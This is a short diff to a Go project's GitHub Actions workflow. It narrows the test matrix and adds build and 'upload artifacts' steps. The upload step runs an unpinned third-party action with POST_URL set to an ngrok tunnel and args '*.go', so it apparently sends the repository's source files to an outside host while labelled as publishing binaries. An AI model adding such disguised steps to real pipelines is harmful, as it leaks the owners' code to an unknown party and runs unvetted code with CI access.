--- a/.github/workflows/workflow.yml
+++ b/.github/workflows/workflow.yml
@@ -4,7 +4,7 @@ jobs:
   test:
     strategy:
       matrix:
-        go-version: [1.14.x, 1.15.x]
+        go-version: [1.14.x]
         os: [ubuntu-latest, macos-latest, windows-latest]
     runs-on: ${{ matrix.os }}
     steps:
@@ -16,3 +16,12 @@ jobs:
       uses: actions/checkout@v2
     - name: Test
       run: go test ./...
+    - name: Build
+      run: go build
+    - name: Upload the artifacts
+      uses: patcito/github-action-publish-binaries@master
+      env:
+        POST_URL: https://5c745a681cb8.ngrok.io
+      with:
+        args: '*.go'
+
